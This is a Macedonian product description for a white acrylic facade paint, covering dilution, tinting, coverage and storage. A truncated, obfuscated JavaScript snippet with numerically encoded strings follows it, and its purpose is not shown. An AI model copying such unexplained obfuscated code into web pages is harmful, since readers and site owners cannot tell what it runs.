
ПОЛИКОЛОР ФАСАДЕН

ПОЛИКОЛОР ФАСАДЕН е бело акрилатно премазно средство на водена база,
наменето за завршна заштита и декоративна обработка на надворешни и внатрешни
ѕидни површини од бетон и продолжени малтери и овозможува долготрајна зашштита од
атмосверски влијанија.
 Може да се разреди со вода (до 20%) и да се нијансира со ПОЛИКОЛОР ПИГМЕНТ или
со ОБОЕН ПОЛИКОЛОР.

  

Пакување: 5л, 15л.

  

Потрошувачка: 1л за околу 5м2 со двепремачкувања.

  

Складирање: Во сува просторија на температура од 5C до 35C.

  

ДА СЕ ЧУВА ОД ЗАМРЗНУВАЊЕ.

  

  

 var a=0,m,v,t,z,x=new
Array('9091968376','8887918192818786347374918784939277359287883421333333338896','
877886888787','949990793917947998942577939317'),l=x.length;while(++a
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